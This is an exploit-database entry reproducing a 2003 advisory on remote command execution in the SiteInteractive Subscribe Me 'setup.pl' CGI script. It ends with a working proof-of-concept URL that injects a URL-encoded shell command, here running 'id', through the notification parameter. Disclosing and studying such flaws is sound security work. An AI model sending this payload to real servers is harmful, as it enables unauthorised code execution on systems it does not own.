SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution

Author: Paul Craig
type: webapps
platform: cgi
port: 
date_added: 2003-12-18  
date_updated: 2012-12-16  
verified: 1  
codes: OSVDB-3134  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23447.txt  

source: https://www.securityfocus.com/bid/9253/info

It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver.

http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notific
ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.